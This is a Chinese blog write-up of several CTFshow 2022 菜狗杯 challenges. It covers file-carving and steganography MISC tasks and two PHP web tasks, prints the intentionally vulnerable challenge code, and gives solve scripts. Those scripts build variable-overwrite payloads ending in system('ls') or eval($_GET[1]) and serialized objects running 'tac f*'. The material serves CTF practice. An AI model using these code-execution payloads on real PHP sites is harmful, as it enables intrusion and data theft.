2022CTFSHOW菜狗杯部分题目(三)

最新推荐文章于 2024-06-14 18:15:48 发布
最新推荐文章于 2024-06-14 18:15:48 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: CTF刷题记录 文章标签: word
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40103894/article/details/127893570
版权

(MISC)一层一层一层地剥开我的♥-ctfshow 【RAR文件头修复|docx|文件分离|base100】

下载附件:
imageimage

打开发现是个word文档,改zip后缀为docx

打开后发现是一堆符号:

image

全选内容修改字体,拿到以下内容:

image

是《一闪一闪亮晶晶》的英文歌词。

对docx文件进行binwalk提取:

image

得到2个压缩包。其中0.zip就是docx文件本身。另一个压缩包中有如下内容:

image

其中2个文件都是加密的。根据docx文件中的信息猜测压缩包密码,结果是《一闪一闪亮晶晶》头两句的简谱音符(离谱),即11556654433221

使用此密码解压压缩包,

image

得到以下文件:

image

先用010editor检查3.jpg。

发现在jpg文件本该结束的位置后面又是另一个jpg文件。(JPG文件通常以FF D8开头,FF D9结束)

image

在编辑器中选中FF D8开始后面的部分,使用文件→保存选择,将后面的图片另存为出来(选中字符串右键选择→标记选择开始,标记选择结束):

image

就得到了另一张图片,其中含有一些文字信息winkwink~​:

image

接下来检查文件名为❤的文件。

用010打开,发现为文件头缺失的RAR压缩文件,RAR的文件头通常是:52 61 72 21 1A 07 01 00

image

补全文件头,并添加rar后缀,发现其中又有一个加密的txt文件:

image

使用上面图中的winkwink~作为密码,解密成功

拿到一个全是表情包的txt文档:

image

用base100进行解密https://ctf.bugku.com/tool/base100

image

**FLAG:**ctfshow{Wa0_wa_Congr@tulations~}

(MISC)0宽字符加密-ctfshow

题目附件明确提示了是0宽隐写:

image

把内容复制到0宽字符解密工具(http://330k.github.io/misc_tools/unicode_steganography.html)中decode即可。

image

**FLAG:**ctfshow{OP_is_for_Over_Power}

(WEB)我的眼里只有$-ctfshow 【变量覆盖】

题目代码:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
<?php /\* # -\*- coding: utf-8 -\*- # @Author: h1xa # @Date: 2022-11-10 17:20:38 # @Last Modified by: h1xa # @Last Modified time: 2022-11-11 08:21:54 # @email: h1xa@ctfer.com # @link: https://ctfer.com \*/ error\_reporting(0); extract(\$\_POST); eval(\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\_); highlight\_file(\_\_FILE\_\_); 可以看到就是个变量覆盖然后再无限套娃。
假设我们post传入`_=a`​那么`$_=a`​,如果在post传入`a=b`​那么`$$_=b`​
以此类推传入一定数量的参数就可以了,最后一个的值要传入eval的代码。 解题脚本: ```php import string s = string.ascii_letters t='_=a&' code="system('ls');" for i in range(35): t+=s[i]+"="+s[i+1]+'&' t+=s[i]+'='+code print(t) ``` 官方WP提供的另一种PHP脚本: ```php $str="_=__"; $res=""; echo "_=__&"; for ($i=0; $i < 34; $i++) { $str="_".$str."_"; echo $str."&"; if($i==33){ echo explode("=", $str)[1]."=eval(\$_GET[1]);"; } } ``` ​![image](https://img-blog.csdnimg.cn/img_convert/88edf07f745da9ffb227dc2c886d3ee3.png)​ # (WEB)webshell-ctfshow 【php反序列化】 题目代码: ```php <?php error_reporting(0); class Webshell { public $cmd = 'echo "Hello World!"'; public function __construct() { $this->init(); } public function init() { if (!preg_match('/flag/i', $this->cmd)) { $this->exec($this->cmd); } } public function exec($cmd) { $result = shell_exec($cmd); echo $result; } } if(isset($_GET['cmd'])) { $serializecmd = $_GET['cmd']; $unserializecmd = unserialize($serializecmd); $unserializecmd->init(); } else { highlight_file(__FILE__); } ?> 

解题脚本:

```php
<?php 
class Webshell {
    public $cmd = 'tac f*';
}
$a = new Webshell();
echo urlencode(serialize($a));
?>

在线运行:

image

传入字符串,获得flag:

image

官方的WP:

<?php 
class Webshell {
    public $cmd = 'cat * >1.txt';
}
$a = new Webshell();
echo serialize($a);
?>

区别:	

	传值后访问1.txt页面,查看flag:

	![image](https://raw.githubusercontent.com/wydyxhxs/images/main/20221116/211246133.png)​

本文参考了官方WP:https://ctf-show.feishu.cn/docx/UpC6dtDqgo7VuoxXlcvcLwzKnqh
羽师傅的WP: link

复苏之枫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【描述】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 描述部分并未提供具体细节,但我们可以推测这道题目的核心是考察选手对于PHP中的变量处理,特别是涉及到循环结构时如何正确地处理变量取值。在PHP中,循环...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow2022菜狗杯 misc之一闪一闪亮晶晶
qq_38338511的博客
03-19 861
听到这种旋律的,就是SSTV电波(多做题多积累),用电脑识别的话需要声卡挺麻烦的,我这里用的是手机Robot36.apk工具识别。作者是用两部手机,一部手机放m4a音频,一部手机打开Robot36工具识别,放在箱子里就行了。打开题目附件,压缩包有一个m4a加密文件,还有一个png图片是伪加密可以直接打开。如果会嫌太吵或者识别模糊的,可以拿个被子盖住,电脑手机丢进去,就很清晰了。手机打开Robot36工具,电脑开声音就可以开始识别了。
CTFshow 2022 菜狗杯部分WEB WP
starttv的博客
11-13 1764
右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名,使用数组键值作为变量值。套娃题,自己本地搭环境,慢慢试就试出来了。可以实现任意文件下载,除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。
CTFSHOW 菜狗杯 Webshell 解题思路和方法
最新发布
weixin_58052886的博客
06-14 359
分析代码,我们输入的参数名为 cmd,同时将传入的参数值首先进行反序列化操作,然后执行 init() 函数发现在反序列化之后。此时我们可以在构造反序列化语句中使用cmd命令。需要注意的是,这里我们不能使用"cat flag.php"命令,因为代码中有匹配判断,我们的代码中不能出现flag ,/i 表示忽略大小写。我们重新将cmd赋值为 “tac f* ”,并运行代码进行序列化:(也可以直接修改,只需要修改命令和对应的字符长度即可)利用序列的结果构造url语句,并测试。
菜狗杯Misc一层一层一层地剥开我的♥wp
Altering_Ji的博客
12-03 905
菜狗杯Misc题目一层一层一层地剥开我的❤的wp
零宽字符的转换和解密
weixin_43121254的博客
02-28 1242
java方法零宽字符的转换和解密
WEB-CTFShow-菜狗杯-我的眼里只有$
qq_31415417的博客
01-02 1072
CTFShow-菜狗杯-我的眼里只有$
ctfshow-web100(php特性)
m0_62094846的博客
01-14 1410
运算符优先级:&& > || > = > and > or is_numeric() 函数用于检测变量是否为数字或数字字符串。 是数字和数字字符串则返回 TRUE,否则返回 FALSE <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 20
2020第十届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTF秀--菜狗杯
m0_59022585的博客
07-09 2511
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
CTFSHOW web入门 web100 wp
wei_xiao_zan的博客
05-22 1315
终于做到100题了!!! 咱就是说先看代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-21 22:10:28 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.p
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 6263
CTFSHOW PHP特性做题笔记 详细学习
ctfshow-Web 解题记录1
weicanh的博客
04-19 4604
ctfshow-Web 解题记录1
零宽度字符隐写(CTF)
热门推荐
Hardworking666的博客
01-02 1万+
文章目录零宽度字符简介用法其他用法例题:[UTCTF2020] zero 零宽度字符简介 零宽度字符是一些不可见的,不可打印的字符。它们存在于页面中主要用于调整字符的显示格式。 常见的零宽度字符及它们的unicode码和原本用途: 零宽度空格符 (zero-width space) U+200B : 用于较长单词的换行分隔 零宽度非断空格符 (zero-width no-break space) U+FEFF : 用于阻止特定位置的换行分隔 零宽度连字符 (zero-width joiner) U+20..
txt零宽度字符隐写
principle1的博客
09-27 2073
零宽度字符就是一些宽度为零,不可见、不可打印的字符,虽然不可见但真实存在,会占用字符空间。很明显是零宽度字符隐写,在上面有找到4种零宽度字符,使用在线解密工具进行解密。在一道ctf题中,给出了一个 secret.txt 文件,然后找flag。在kali里面使用 vim secret.txt 打开文件。最后解密可以得到flag。
【更新ing】
qq_52648141的博客
05-20 268
工具一把梭:base58解码得:666c61677b496e6772336431656e745f30465f59657365635f69355f4f4f4f4f4f7d。题目来源 BUUCTF mewstar CTF week2 MISC Coldwinds’s Desktop。刚开始不知道,找了在线网站,其实不用…flag移到桌面吧,然后到gaps命令,1.查看文件属性和图片像素,后面会用到。(CTFCTF图片拼图&安装坑点)把文件夹放到kali中,然后。有数字代表1没数字代表0。
ctfshow菜狗杯web
09-07
ctfshow菜狗杯web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2是沙箱逃逸的入手点。 在解题过程中,可以通过传入cookie中的CTFshow-QQ群:=a,然后通过$_GET['b']和$_REQUEST['c']的方式获取到需要的值。最终可以通过传入一个数组给到eval来执行代码。 总的来说,ctfshow菜狗杯web是一个CTF比赛中的项目,其中包含了多个题目和挑战,其中一个题目是"web2 c0me_t0_s1gn",解题过程中需要利用沙箱逃逸和通过传入参数来执行代码。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值